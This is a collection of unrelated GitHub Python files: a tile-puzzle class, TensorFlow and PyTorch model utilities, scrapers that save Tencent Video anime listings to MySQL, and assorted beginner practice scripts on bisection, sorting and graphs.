Get the professor in top position
"""
return self.professors[self.rotation % 4]
def right(self):
"""
Get the professor in right position
"""
return self.professors[(self.rotation + 1) % 4]
def bottom(self):
"""
Get the professor in bottom position
"""
return self.professors[(self.rotation + 2) % 4]
def left(self):
"""
Get the professor in left position
"""
return self.professors[(self.rotation + 3) % 4]
def rotate(self, steps=1) -> None:
"""
Rotate this tile a number of steps clockwise.
Number may be negative to indicate counter clockwise.
"""
self.rotation -= steps
class Professor:
"""
Representation of a professor who consists of a body half in a particular color
"""
_VALID_BODY_PARTS = ['upper', 'lower']
_VALID_COLORS = ['blue', 'purple', 'green', 'brown']
def __init__(self, body, color):
if body.lower() not in Professor._VALID_BODY_PARTS:
raise ValueError(f'Invalid body part {body}. Valid alternatives: {Professor._VALID_BODY_PARTS}')
if color.lower() not in Professor._VALID_COLORS:
raise ValueError(f'Invalid color {color}. Valid alternatives: {Professor._VALID_COLORS}')
self.body = body.lower()
self.color = color.lower()
def __str__(self):
return f'{self.body} - {self.color}'
def matches(self, professor) -> bool:
"""
Test if a professor can be placed next to another one
by comparing body parts and color.
"""
return self.body != professor.body and self.color == professor.color
``` |
{
"source": "804173948/nslt",
"score": 2
} |
#### File: nslt/utils/iterator_utils.py
```python
from __future__ import print_function
import collections
from os import listdir
from os.path import isfile, join
import numpy as np
import cv2
import tensorflow as tf
__all__ = ["BatchedInput", "get_iterator", "get_infer_iterator"]
# NOTE(ebrevdo): When we subclass this, instances' __dict__ becomes empty.
class BatchedInput(collections.namedtuple("BatchedInput",
("initializer",
"source",
"target_input",
"target_output",
"source_sequence_length",
"target_sequence_length"))):
pass
# 推断迭代器
def get_infer_iterator(src_dataset,
source_reverse,
src_max_len=None):
# Get number of Frames
src_dataset = src_dataset.map(lambda src: (src, tf.py_func(get_number_of_frames, [src], tf.int32)))
# Filter Out Samples
src_dataset = src_dataset.filter(lambda src, src_len: tf.logical_and(src_len > 0, src_len < src_max_len))
src_dataset = src_dataset.map(lambda src, src_len:
(tf.reshape( # 改变形状
tf.pad( # 补充 0
tf.py_func( # 读视频
read_video, [src, source_reverse], tf.float32
),
[[0, src_max_len - src_len], [0, 0], [0, 0], [0, 0]],
"CONSTANT"
),
[300, 227, 227, 3]
),
tf.reshape(src_len, [1])))
batched_iter = src_dataset.make_initializable_iterator()
(src_video, src_seq_len) = batched_iter.get_next()
return BatchedInput(initializer=batched_iter.initializer,
source=src_video,
target_input=None,
target_output=None,
source_sequence_length=src_seq_len,
target_sequence_length=None)
"""
def get_number_of_frames(src):
return np.int32(len([f for f in listdir(src) if isfile(join(src, f))]))
def read_video(src, source_reverse):
images = sorted([f for f in listdir(src) if isfile(join(src, f))])
video = np.zeros((len(images), 227, 227, 3)).astype(np.float32)
# Cihan_CR: Harcoded Path, Need to Change This
mean_image = np.load('../Mean/FulFrame_Mean_Image_227x227.npy').astype(np.float32)[..., ::-1]
# for each image
for i in range(0, len(images)):
video[i, :, :, :] = cv2.imread(src + images[i]).astype(np.float32) - mean_image
if source_reverse:
video = np.flip(video, axis=0)
return video
"""
def get_number_of_frames(src):
""" get the number of frames of video at path src.
Args:
src (bytes): path of the video. Its format like: '~/path/to/video/file.avi'
Returns:
numpy.int32: number of frames
"""
if isinstance(src, bytes):
src = src.decode('utf-8')
fps = 10 # custom fps
cap = cv2.VideoCapture(src)
assert cap.isOpened()
# calculate sample_factor to reset fps
old_fps = cap.get(cv2.CAP_PROP_FPS) # CAP_RPOP_FPS
sample_factor = int(old_fps / fps)
# calculate new number of frames at given fps
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
new_num_frames = int(num_frames / sample_factor)
cap.release()
return np.int32(new_num_frames)
def read_video(src, source_reverse):
"""
read video to numpy.ndarray (L x H x W x C)
Args:
src (bytes): path of the video. Its format like: '~/path/to/video/file.avi'
source_reverse (bool): whether to reverse the video sequence
Returns:
numpy.ndarray: Video (L x H x W x C)
"""
print('read_video:')
print(src)
if isinstance(src, bytes):
src = src.decode('utf-8')
fps = 10 # custom fps
# open video file
cap = cv2.VideoCapture(src)
assert cap.isOpened()
# calculate sample_factor to reset fps
old_fps = cap.get(cv2.CAP_PROP_FPS) # fps of video
sample_factor = int(old_fps / fps)
assert sample_factor >= 1
# init empty output frames (L x H x W x C)
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
num_frames = int(num_frames / sample_factor)
video = np.zeros((num_frames, 227, 227, 3)).astype(np.float32)
for index in range(num_frames):
frame_index = sample_factor * index
# read frame
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame = cap.read()
assert ret
# successfully read frame
# BGR to RGB
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# resize frame to (227, 227)
frame = cv2.resize(frame, (227, 227))
# map pixels to [0, 1]
frame = (frame / 255).astype('float32')
video[index, :, :, :] = frame
cap.release()
if source_reverse:
video = np.flip(video, axis=0)
return video
def get_iterator(src_dataset,
tgt_dataset,
tgt_vocab_table,
sos,
eos,
source_reverse,
random_seed,
src_max_len=None,
tgt_max_len=None,
num_threads=4,
output_buffer_size=None,
skip_count=None):
# Cihan_CR: Hard Codded - Need to Change this
# if not output_buffer_size:
# output_buffer_size = 10 # batch_size * 1000
output_buffer_size = 10
tgt_sos_id = tf.cast(tgt_vocab_table.lookup(tf.constant(sos)), tf.int32)
tgt_eos_id = tf.cast(tgt_vocab_table.lookup(tf.constant(eos)), tf.int32)
# Concat Datasets
src_tgt_dataset = tf.contrib.data.Dataset.zip((src_dataset, tgt_dataset))
# Skip Data
if skip_count is not None:
src_tgt_dataset = src_tgt_dataset.skip(skip_count)
# Shuffle Samples: You must do it as early as possible
src_tgt_dataset = src_tgt_dataset.shuffle(output_buffer_size * 1000, random_seed)
# Get number of frames from videos
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt:
(src, tgt, tf.py_func(get_number_of_frames, [src], tf.int32)),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Split Translation into Tokens
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src, tf.string_split([tgt]).values, src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Sequence Length Checks
src_tgt_dataset = src_tgt_dataset.filter(lambda src, tgt, src_len: tf.logical_and(src_len > 0, tf.size(tgt) > 0))
src_tgt_dataset = src_tgt_dataset.filter(lambda src, tgt, src_len: tf.logical_and(src_len < src_max_len, tf.size(tgt) < tgt_max_len))
# Convert Tokens to IDs
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src, tf.cast(tgt_vocab_table.lookup(tgt), tf.int32), src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Create Input and Output for Target
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src,
tf.concat(([tgt_sos_id], tgt), 0),
tf.concat((tgt, [tgt_eos_id]), 0),
src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Get Target Sequence Length
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len:
(src, tgt_in, tgt_out, src_len, tf.size(tgt_in)),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Pad Target Sequence With 0s
# src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len, tgt_len:
# (src,
# tf.pad(tgt_in, [[0, tgt_max_len - tgt_len]], "CONSTANT"),
# tf.pad(tgt_out, [[0, tgt_max_len - tgt_len]], "CONSTANT"),
# src_len,
# tgt_len),
# num_threads=num_threads, output_buffer_size=output_buffer_size)
# Read and Pad Source Video from source path
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len, tgt_len:
# src_video
(tf.reshape( # 改变形状
tf.pad( # 补充 0
tf.py_func( # 读视频
read_video, [src, source_reverse], tf.float32
),
[[0, src_max_len - src_len], [0, 0], [0, 0], [0, 0]],
"CONSTANT"
),
[300,227,227,3]
),
# tgt_input_ids
tf.expand_dims(tgt_in, 0),
# tgt_output_ids
tf.expand_dims(tgt_out, 0),
# src_seq_len
tf.reshape(src_len, [1]),
# tgt_seq_len
tf.reshape(tgt_len, [1])),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Create Initializer
batched_iter = src_tgt_dataset.make_initializable_iterator()
# Get Next Function
src_video, tgt_input_ids, tgt_output_ids, src_seq_len, tgt_seq_len = batched_iter.get_next()
# Return Input
return BatchedInput(initializer=batched_iter.initializer, source=src_video, target_input=tgt_input_ids,
target_output=tgt_output_ids,
source_sequence_length=src_seq_len, target_sequence_length=tgt_seq_len)
``` |
{
"source": "804463592/triplet-reid-pytorch",
"score": 3
} |
#### File: 804463592/triplet-reid-pytorch/backbone.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
'''
As goes with pytorch pretrained models, inception_v3 requires the input image sizes to be (299, 299), while input image sizes for other pretrained models to be (224, 224)
'''
class DenseNormReLU(nn.Module):
def __init__(self, in_feats, out_feats, *args, **kwargs):
super(DenseNormReLU, self).__init__(*args, **kwargs)
self.dense = nn.Linear(in_features = in_feats, out_features = out_feats)
self.bn = nn.BatchNorm1d(out_feats)
self.relu = nn.ReLU(inplace = True)
def forward(self, x):
x = self.dense(x)
x = self.bn(x)
x = self.relu(x)
return x
class EmbedNetwork(nn.Module):
def __init__(self, dims = 128, pretrained_base = True, *args, **kwargs):
super(EmbedNetwork, self).__init__(*args, **kwargs)
resnet50 = torchvision.models.resnet50(pretrained_base)
self.base = nn.Sequential(resnet50.conv1,
resnet50.bn1,
resnet50.relu,
resnet50.maxpool,
resnet50.layer1,
resnet50.layer2,
resnet50.layer3,
resnet50.layer4,)
# self.base = torchvision.models.inception_v3(pretrained_base)
self.fc_head = DenseNormReLU(in_feats = 2048, out_feats = 1024)
self.embed = nn.Linear(in_features = 1024, out_features = dims)
def forward(self, x):
x = self.base(x)
_, _, h, w = x.shape
x = F.avg_pool2d(x, (h, w))
x = x.contiguous().view(-1, 2048)
x = self.fc_head(x)
x = self.embed(x)
return x
if __name__ == "__main__":
embed_net = EmbedNetwork(pretrained_base = True)
print(embed_net)
# # in_tensor = torch.randn((15, 3, 299, 299))
# in_tensor = torch.randn((15, 3, 224, 224))
# # print(in_tensor.shape)
# embd = embed_net(in_tensor)
# print(embd.shape)
# print(embed_net.state_dict().keys())
# # print(embed_net.base[0].weight)
# net = torchvision.models.resnet50(False)
# # print(net.conv1.weight)
# print(torch.sum(embed_net.base[0].weight == net.conv1.weight))
# print(embed_net.base[0].weight.shape)
# print(net.conv1.weight.shape)
for i, ly in enumerate(embed_net.base):
print(ly.__class__.__name__)
if i > 4: break
# break
``` |
{
"source": "80491636/thinkPHP_DM",
"score": 3
} |
#### File: 国内视频站/腾讯动漫采集/Main.py
```python
import requests
import re
import sys
import time
import pymysql
import random
from bs4 import BeautifulSoup
# 连接数据库
connect = pymysql.Connect(
host = 'localhost',
port = 3306,
user = 'root',
passwd = '<PASSWORD>',
db = 'blog',
charset = 'utf8'
)
# 获取游标
cursor = connect.cursor()
class Main:
user_agent_list = ['Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36']
UserAgent=random.choice(user_agent_list)
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': UserAgent,
}
def getCateID(self):
for i in range(1,5):
self.getList(i)
def getList(self,iarea):
listpage = 0
for offset in range(0,10000,30):
listpage += 1
# 打开页面
url = "https://v.qq.com/x/bu/pagesheet/list?_all=1&append=1&channel=cartoon&iarea=" + str(iarea) + "&listpage=" + str(listpage) + "&offset=" + str(offset) + "&pagesize=30&sort=18"
try:
r = requests.get(url,headers = self.header)
print("链接状态:",r.status_code," 地址:",url)
except Exception as e:
print("打开链接错误:",e)
continue
# 分析页面内容
soup = BeautifulSoup(r.content,"html.parser")
if(soup.find_all('div', {'class': 'list_item'}) == []):
print('程序采集完成',iarea)
return
# 获取列表页面
for items in soup.find_all('div', {'class': 'list_item'}):
# 缩略图
try:
pic = items.find('img')['src']
except Exception as e:
print("读取缩略图遇到错误",e)
continue
if(pic == ''):
print("没有缩略图 直接跳过")
continue
# 别名
try:
second_title = items.find('div',{'class':'figure_desc'}).text
except Exception as e:
second_title = ""
# 集数
try:
sets = items.find('div',{'class':'figure_caption'}).text
except Exception as e:
sets = ''
try:
figure_detail = items.find('div',{'class':'figure_detail'})
except Exception as e:
figure_detail = ''
# 电影名
try:
title = figure_detail.find('a').text
except Exception as e:
title = ''
# 播放页面地址
try:
href = figure_detail.find('a')['href']
except Exception as e:
href = ''
title = pymysql.escape_string(str(title))
print("缩略图地址:",pic," 电影名称:",title," 别名 ",second_title," 播放地址:",href," 集数:",sets)
#查询重复
sql = "SELECT id,title,sets_state FROM tp_vcate where title='%s'"
tdata = (title)
cursor.execute(sql % tdata)
updateID = ""
print("查询到" + str(cursor.rowcount) + "条与标题 " + title +" 一致的数据")
if(cursor.rowcount > 0):
fetch = cursor.fetchone()
updateID = fetch[0]
updatestate = fetch[2]
if(updatestate == 0):
try:
sql = "UPDATE tp_vcate set title = '%s', second_title = '%s', pic = '%s', sets = '%s', sets_state = '%d', url = '%s',cateid = '%d' where id = '%d'"
sets_state = 0
matchObj = re.match( r'全(.*)', sets, re.M|re.I)
if matchObj:
sets_state = 1
else:
sets_state = 0
data = (title, second_title, pic, sets, sets_state, href, iarea + 1,updateID)
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print(e)
continue
continue
else:
# 插入数据
try:
sql = "INSERT INTO tp_vcate (title, second_title, pic, sets, sets_state, url ,cateid) \
VALUES ( '%s', '%s','%s','%s','%d','%s' ,'%d')"
sets_state = 0
matchObj = re.match( r'全(.*)', sets, re.M|re.I)
if matchObj:
sets_state = 1
else:
sets_state = 0
data = (title, second_title, pic, sets, sets_state, href, iarea + 1)
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print(e)
continue
if __name__ == "__main__":
main = Main()
main.getCateID()
# 关闭连接
cursor.close()
connect.close()
```
#### File: 国内视频站/腾讯动漫采集/PlayList.py
```python
import requests
import re
import sys
import time
import pymysql
import demjson
import json
import random
from bs4 import BeautifulSoup
# 连接数据库
connect = pymysql.Connect(
host = 'localhost',
port = 3306,
user = 'root',
passwd = '<PASSWORD>',
db = 'blog',
charset = 'utf8'
)
# 获取游标
cursor = connect.cursor()
class PlayList:
user_agent_list = ['Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36']
UserAgent=random.choice(user_agent_list)
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': UserAgent,
}
tuple_list=[]
vcate_id = ""
def __init__(self):
# 查询数据库 未完结数据
sql = "SELECT * FROM tp_vcate"
cursor.execute(sql)
for row in cursor.fetchall():
self.vcate_id = row[0]
title = row[1]
url = row[6]
# 打开页面
try:
r = requests.get(url, headers=self.header, timeout=5)
except Exception as e:
f=open('链接打开错误.txt','a')
f.write('打开连接失败:' + url + '\n')
f.close()
print('打开播放页失败:',e)
if r.status_code != 200:
f=open('链接打开错误.txt','a')
f.write('返回错误代码:' + url + str(r.status_code) + '\n')
f.close()
print('页面打开错误',str(r.status_code),url)
continue
#print("链接状态:",r.status_code)
r.encoding = 'utf-8'
# 正则JSON内容
cover = ''
searchObj = re.search( 'var COVER_INFO =(.*)',r.text, re.M|re.I)
if searchObj:
cover = searchObj.group(1)
else:
f=open('链接打开错误.txt','a')
f.write('没有找到JSON:' + url + '\n')
f.close()
print ("没有找到 cover JSON")
continue
try:
cover_info = demjson.decode(cover)
self.hasKey(cover_info)
except Exception as e:
f=open('json错误.txt','a')
f.write('解析JSON错误:' + url + '\n')
f.close()
print ("解析JSON错误 "+ url )
continue
# return
# 查询数据库
sql = "SELECT * FROM tp_pcate where vcate_id = '%s'"
tdata = (self.vcate_id)
cursor.execute(sql % tdata)
updateID = ""
print(cursor.rowcount)
if(cursor.rowcount > 0):
updateID = cursor.fetchone()[0]
self.tuple_list.append( updateID )
data = tuple(self.tuple_list)
print(url,"更新数据",cover_info['series_name'],title)
sql = "UPDATE tp_pcate set source = '%s', vcate_id = '%d', pageid = '%s', leading_actor_id = '%s', second_title = '%s', publish_date = '%s', current_num = '%s', type_name = '%s', \
horizontal_pic_url = '%s', cartoon_age = '%s', area_name = '%s', tag = '%s',doulie_tags = '%s', series_name = '%s', vertical_pic_url = '%s', director_id = '%s', description = '%s', \
dialogue = '%s', update_notify_desc = '%s', episode_updated = '%s', score = '%s', nomal_ids = '%s',view_today_count = '%d' where id='%d'"
try:
cursor.execute(sql % data)
connect.commit()
continue
except Exception as e:
print("更新数据库失败" ,e)
f=open('1.txt','a')
f.write(pymysql.escape_string(cover_info['series_name'])+"\n")
f.close()
continue
else:
data = tuple(self.tuple_list)
#添加数据
sql = "INSERT INTO tp_pcate(source, vcate_id, pageid, leading_actor_id, second_title, publish_date, current_num, type_name, horizontal_pic_url, cartoon_age, area_name, tag,\
doulie_tags, series_name, vertical_pic_url, director_id, description, dialogue, update_notify_desc, episode_updated, score, nomal_ids,view_today_count) VALUES\
('%s','%d', '%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%d')"
print(url,"写入数据",cover_info['series_name'],title)
try:
cursor.execute(sql % data)
connect.commit()
except Exception as e:
print("写入数据库失败" ,e)
f=open('1.txt','a')
f.write(pymysql.escape_string(cover_info['series_name'])+"\n")
f.close()
print(data)
continue
def setEscape(self,data):
if(type(data) == str or type(data) == int):
return data
return json.dumps( data ,ensure_ascii=False)
def hasKey(self,dicts):
source = "v.qq.com"
key = ['id','leading_actor_id','second_title','publish_date','current_num','type_name','horizontal_pic_url','cartoon_age','area_name','tag',\
'doulie_tags','title','vertical_pic_url','director_id','description','dialogue','update_notify_desc','episode_updated','score','nomal_ids','view_today_count',]
self.tuple_list=[source,self.vcate_id]
for i in range(0,len(key)):
#判断字典中是否有key
if(key[i] in dicts.keys()):
self.tuple_list.append( self.setEscape( dicts[key[i]] ) )
else:
self.tuple_list.append( None )
if __name__ == "__main__":
playlist = PlayList()
# 关闭连接
cursor.close()
connect.close()
``` |
{
"source": "8055aa/Python3Code",
"score": 3
} |
#### File: 8055aa/Python3Code/hello2.py
```python
"I am : doestr.__doc__"
import imp
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import calendar
message = "After editing"
def printer():
print('reloaded:',message)
def func(spam, eggs=0, toast = 0, ham = 0):
print(spam, eggs, toast, ham)
def indirect(func, arg):
func(arg)
def intersect(*args):
res = []
for x in args[0]:
for other in args[1:]:
if x not in other :break
else:
res.append(x)
return res
def union(*args):
res = []
for seq in args:
for x in seq:
if not x in res:
res.append(x)
return res
def outer(x):
global inner
def inner(i):
print(i)
if i : inner(i - 1)
inner(x)
class FirstClass:
def setdata(self, value):
self.data = value
def display(self):
print(self.data)
class SecondClass(FirstClass):
def display(self):
print('Current value = {0}'.format(self.data))
class ThirdClass(SecondClass):
def __init__(self, value):
self.data = value
def __add__(self, other):
return ThirdClass(self.data + other)
def __mul__(self, other):
self.data = self.data * other
class Subclass():
data = 'SPAM'
def __init__(self, value):
self.data = value
def display(self):
print(self.data, Subclass.data)
def factory(aClass, *args):
return imp.apply(aClass, args)
class Spam:
"I am: spam.__doc__ or docstr.spam.__doc__"
def doit(self, message):
print(message)
def method(self, arg):
"I am: spam.method.__doc__ or self.method.__doc__"
pass
def func(args):
"I am: docstr.func.__doc__"
pass
class Person:
def __init__(self, name, job):
self.name = name
self.job = job
if __name__ == '__main__':
print('This program is being run by itself')
'''
table = {'Python': '<NAME>', 'Perl':'<NAME>', 'Tcl': '<NAME>'}
language = 'Python'
creator = table[language]
print(creator)
for lang in table.keys():
print(" {0}'s creator is : {1}".format(lang, table[lang]))
'''
''''
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 16:17:13 2015
@author: Eddy_zheng
"""
from matplotlib import pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
X = np.arange(-4, 4, 0.25)
Y = np.arange(-4, 4, 0.25)
X, Y = np.meshgrid(X, Y)
R = np.sqrt(X ** 2 + Y ** 2)
Z = np.sin(R)
# 具体函数方法可用 help(function) 查看,如:help(ax.plot_surface)
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap='rainbow')
plt.show()
'''
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 16:37:21 2015
@author: Eddy_zheng
"""
''''
data = np.random.randint(0, 255, size=[40, 40, 40])
x, y, z = data[0], data[1], data[2]
ax = plt.subplot(111, projection='3d') # 创建一个三维的绘图工程
# 将数据点分成三部分画,在颜色上有区分度
ax.scatter(x[:10], y[:10], z[:10], c='y') # 绘制数据点
ax.scatter(x[10:20], y[10:20], z[10:20], c='r')
ax.scatter(x[30:40], y[30:40], z[30:40], c='g')
ax.set_zlabel('Z') # 坐标轴
ax.set_ylabel('Y')
ax.set_xlabel('X')
plt.show()
'''
# !/usr/bin/python3
print("我的姓名是{0},年龄是{1}".format("杨萌青","20"))
else:
print("I am being imported from another module")
print('Done')
```
#### File: 8055aa/Python3Code/inputKeyboardInterrupt.py
```python
import cmath
import random
import sys
__author__ = '<NAME>'
__project__ = 'This is My Simple Python Application '
'''
a = float(input('输入三角形第一边长:'))
b = float(input('输入三角形第二边长:'))
c = float(input('输入三角形第三边长:'))
while a + b <= c or a + c <= b or b + c <= a:
print('输入的边构不成三角形,请重新输入!!')
a = float(input('输入三角形第一边长:'))
b = float(input('输入三角形第二边长:'))
c = float(input('输入三角形第三边长:'))
s = (a + b + c) / 2
area = (s * (s - a) * (s - b) * (s - c)) ** 0.5
print('三角形的面积为: %0.2f' % area) '''
# print(random.randint(0, 9))
'''
num = int(input('请输入一个数字:'))
if(num % 2) == 0:
print('{0} 是偶数'.format(num))
else:
print('{0} 是奇数'.format(num)) '''
# Python 程序用于检测用户输入的数字是否为质数
'''
# 用户输入数字
num = int(input("请输入一个数字: "))
# 质数大于 1
if num > 1:
# 查看因子
for i in range(2, num):
if (num % i) == 0:
print(num, "不是质数")
print(i, "乘于", num // i, "是", num)
break
else:
print(num, "是质数")
# 如果输入的数字小于或等于 1,不是质数
else:
print(num, "不是质数") '''
list1 = ['Google', 'Runoob', 1997, 2000]
list2 = [1, 2, 3, 4, 5, 1, 1, 1, 2]
list3 = ["a", "b", "c", "d"]
tup1 = ('Google', 'Runoob', 1997, 2000)
tup2 = (1, 2, 3, 4, 5)
tup3 = "a", "b", "c", "d"
dict1 = {'Alice': '2341', 'Beth': '9102', 'Cecil': '3258'}
dict2 = {'abc': 987}
def area(width, height):
return width * height
def print_welcome(name):
print("Welcome {0} !!!!!!".format(name))
def ChangeInt(a):
a = 10
print(a)
def printinfo(arg1, *vartuple):
"打印任何传入的参数"
print("输出:")
print(arg1)
for var in vartuple:
print(var)
return
def outer():
num = 10
def inner():
nonlocal num
num = 200
print(num)
inner()
print(num)
def change_me(mylist):
mylist = [1, 2, 3, 4, 5]
print("函数内取值:", mylist)
return
def fab(max):
n, a, b = 0, 0, 1
while n < max:
yield b
a, b = b, a + b
n = n + 1
class FirstClass:
def setdata(self, value):
self.data = value
def display(self):
print(self.data)
if __name__ == '__main__':
print('程序自身运行')
for i in range(1, 10):
for j in range(1, i + 1):
print('{0} x {1} = {2}\t'.format(j, i , i*j), end =' ')
print()
else:
print('我来自另一个模块')
``` |
{
"source": "8059542577066/Bisecting-float-Algorithms-in-Python-3",
"score": 3
} |
#### File: 8059542577066/Bisecting-float-Algorithms-in-Python-3/functions.py
```python
def golden():
x, m = 1, 1 / 2
while x + m != x - m:
if x ** 2 - x - 1 < 0:
x += m
else:
x -= m
m /= 2
return x
def plastic():
x, m = 1, 1 / 2
while x + m != x - m:
if x ** 3 - x - 1 < 0:
x += m
else:
x -= m
m /= 2
return x
def pentagon():
x, m = 1, 1 / 2
while x + m != x - m:
if 256 * x ** 4 - 800 * x ** 2 + 125 < 0:
x += m
else:
x -= m
m /= 2
return x
def hexagon():
x, m = 2, 1 / 2
while x + m != x - m:
if 4 * x ** 2 - 27 < 0:
x += m
else:
x -= m
m /= 2
return x
def sqrt(n):
x = 1
while x ** 2 < n:
x *= 2
m = x / 2
while x + m != x - m:
if x ** 2 < n:
x += m
else:
x -= m
m /= 2
return x
def cbrt(n):
x = 1
while x ** 3 < n:
x *= 2
m = x / 2
while x + m != x - m:
if x ** 3 < n:
x += m
else:
x -= m
m /= 2
return x
``` |
{
"source": "8059542577066/Heap-Sort-Merge-Sort-and-Binary-Search",
"score": 4
} |
#### File: 8059542577066/Heap-Sort-Merge-Sort-and-Binary-Search/Merge Sort.py
```python
import random
def sort(array, e1, e2):
m1 = (e1 + e2) / 2
m2 = m1 + 1
if e1 != m1:
sort(array, e1, m1)
sort(array, m2, e2)
temp = []
i1 = e1
i2 = m2
while i1 <= m1 and i2 <= e2:
if array[i1] <= array[i2]:
temp.append(array[i1])
i1 += 1
else:
temp.append(array[i2])
i2 += 1
if i1 > m1:
while i2 <= e2:
temp.append(array[i2])
i2 += 1
else:
while i1 <= m1:
temp.append(array[i1])
i1 += 1
for i in xrange(len(temp)):
array[e1 + i] = temp[i]
def main():
print "Merge Sort"
count = int(raw_input("Number of Items: "))
numbers = []
for i in xrange(count):
numbers.append(random.getrandbits(64))
print "\nBefore Sorting:"
print "numbers == sorted(numbers): " + str(numbers == sorted(numbers))
sort(numbers, 0, len(numbers) - 1)
print "\nAfter Sorting:"
print "numbers == sorted(numbers): " + str(numbers == sorted(numbers))
raw_input()
if __name__ == "__main__":
main()
``` |
{
"source": "805bluebell/DS-alogs-practice",
"score": 3
} |
#### File: DS-alogs-practice/graph/dfs.py
```python
gg = {
'a':['b', 'c'],
'b':['c', 'd'],
'c':['d'],
'd':['c'],
'e':['f'],
'f':['c']
}
g = {
'u': ['x', 'v', 'p'],
'x': ['v', 'q'],
'v': ['y'],
'y': ['x'],
'w': ['y', 'z'],
'z': ['z'],
'p': [],
'q': []
}
discovery = dict()
for k, v in g.items():
discovery[k] = False
# print(discovery)
def dfs(g, v):
discovery[v] = True
print(v, end=" ")
for ichi in g[v]:
if not discovery[ichi]:
dfs(g, ichi)
dfs(g, 'w')
```
#### File: DS-alogs-practice/recursion_dynamic_programming/insertAt_bottomOf_stack.py
```python
class item:
def __init__(self, value, next):
self.value = value
self.next = next
class stack:
def __init__(self, top, height):
self.top = top
self.height = height
def pussh(self, a):
t = item(a, self.top)
top = t
self.height += 1
def popp(self):
t = top.value
top = top.next
self.height -= 1
def iterate(self):
